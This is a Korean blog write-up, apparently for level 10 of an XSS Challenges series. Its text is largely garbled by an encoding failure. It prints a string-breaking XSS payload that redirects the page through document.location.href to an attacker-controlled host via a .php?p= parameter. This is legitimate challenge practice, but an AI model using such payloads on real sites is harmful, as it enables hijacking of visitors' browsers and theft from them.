ํฐ์คํ ๋ฆฌ ๋ทฐ
level 10๋จ๊ณ๋ฅผ ์งํํ๊ฒ ์ต๋๋ค. ํ๋ฉด์ ๋ณด์ด๋ ํ๋ฉด์ ์ด์ ๊ณผ ์ ์ฌํ ๋ชจ์ต์ ๋์ฐ๊ณ ์์ต๋๋ค. ๋ด๋ถ ์ฝ๋๋ฅผ ๋จผ์ ์ดํด๋ณด๋๋ก ํ๊ฒ ์ต๋๋ค.
10๋จ๊ณ์์๋ a์ b๋ผ๋ ๋ณ์์ ๊ฐ์ด ์ ์ธ๋์ด ์๋ ์ํ์ ๋๋ค. ์ฐ๋ฆฌ๊ฐ ์ ๋ ฅํ Payload๋ "a" ๋ณ์์ ๋ด๊ธฐ๋๋ก ๋์ด์๋๋ฐ document.write ์์ฑ์ ํตํด ๊ฐ์ด ์คํ๋๋ ๊ฒ์ ๋ณด์ค ์ ์์ต๋๋ค.
document.write()์ ๊ธฐ๋ฅ์ Document Object์ ํจ์๋ก ์ธ์ ๊ฐ์ ์น ๋ธ๋ฌ์ฐ์ ํ๋ฉด์ ํ ์คํธ ํ์์ผ๋ก ์ถ๋ ฅํด์ฃผ๋ ๊ธฐ๋ฅ์ ๊ฐ์ง๊ณ ์์ต๋๋ค.
';{document.location.href="http://IP"}//
9๋จ๊ณ์์ ์งํํ ๋ฐฉ๋ฒ๋๋ก a๋ณ์๋ฅผ ๋ซ์ ๋ง๋ฌด๋ฆฌ(;)ํด์ฃผ๊ณ ๊ณต๊ฒฉ์ ์๋ฒ๋ฅผ ๋ก๋์์ผ ์คํฌ๋ฆฝํธ๊ฐ ์คํ๋๋๋ก ํด์ฃผ๋ฉด ๋ ๊ฒ ๊ฐ์ต๋๋ค. ๋ค์ ๋๋ธ ์ฌ๋ฌ์ฌ"//"๋ ๋งจ ๋์ ์ฑ๊ธ ์ฟผํฐ" ' "๋ฅผ ์ฃผ์ ์ฒ๋ฆฌํ์ฌ ์๋ฌ๊ฐ ๋ํ๋์ง ์๋๋ก ํด์ค์ผ ๋ฉ๋๋ค.
.php?p= ํ๋ผ๋ฏธํฐ์ ์ฌ๋ฐ๋ฅธ Payload๋ฅผ ์ฝ์ ํด ์์ฒญํด๋ณด๋๋ก ํ๊ฒ ์ต๋๋ค.
๋ค์ด์ผ๋ก๊ทธ ์ฐฝ์ด ๋ํ๋๋ฉด ์ด์ ๋ค์ ๋จ๊ณ๋ก ๋์ด๊ฐ ๋ด ์๋ค.!!
'CHALLENGE' ์นดํ ๊ณ ๋ฆฌ์ ๋ค๋ฅธ ๊ธ
XSS Challenges 12 (0) | 2021.08.28 |
---|---|
XSS Challenges 11 (0) | 2021.08.27 |
XSS Challenges 9 (0) | 2021.08.25 |
XSS Challenges 8-1 (0) | 2020.12.12 |
[LOS] Dragon ํ์ด(20) (0) | 2020.12.11 |